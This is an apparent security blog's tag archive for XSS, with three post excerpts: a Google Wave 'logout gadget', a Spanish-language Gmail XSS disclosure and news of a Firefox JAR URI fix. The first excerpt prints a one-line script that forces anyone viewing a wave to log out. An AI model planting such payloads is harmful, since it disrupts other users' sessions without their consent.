Tag Archives: XSS

Google Wave – Make your friends logout gadget

Posted on November 20, 2009 by Fernando

Adding this gadget to any wave will make people log out when they see it: http://beford.org/stuff/waveg.xml The code: <script type=”text/javascript”> top.location=”https://wave.google.com/wave/logout”; </script>

Posted in Uncategorized | Tagged csrf, google, Security, wave, xml, XSS | 3 Comments

Gmail Cross Site Scripting

Posted on May 4, 2008 by Fernando

El dia de hoy les traigo un pequeño descubrimiento, una vulnerabilidad en el sistema de Presentaciones (para los burros, powerpoint) en linea de Google Mail. El problema es sencillo, y no le tomara mucho tiempo arreglar a los de Mountain View, pero hay algo que me preocupa más. Describire el problema de Gmail rapidamente para poder pasar al detalle del plugin de flash. Continue reading →

Posted in Español, Security, XSS | Tagged gecko, gmail, google, opera, Security, XSS | Leave a comment

Firefox 2.0.0.10 released

Posted on November 27, 2007 by Fernando

Mozilla Corporation just released Firefox 2.0.0.10 which includes fixes against JAR uri attacks. This issue affected browsers that used Gecko engine, a quick check showed me that only K-meleon browser was also updated, however there are several Gecko based web … Continue reading →

Posted in English, Security, XSS | Tagged firefox, gecko, jar, mozilla, Security, XSS | Leave a comment

Tag Archives: XSS

Google Wave – Make your friends logout gadget

Gmail Cross Site Scripting

Firefox 2.0.0.10 released

Archives

Meta